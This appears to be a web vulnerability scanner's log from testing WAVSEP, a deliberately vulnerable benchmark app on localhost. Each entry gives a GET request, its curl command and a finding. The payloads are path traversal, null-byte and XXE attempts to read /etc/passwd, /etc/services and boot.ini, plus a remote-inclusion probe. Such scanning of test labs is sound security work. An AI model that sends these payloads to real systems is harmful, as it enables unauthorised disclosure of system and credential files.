GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
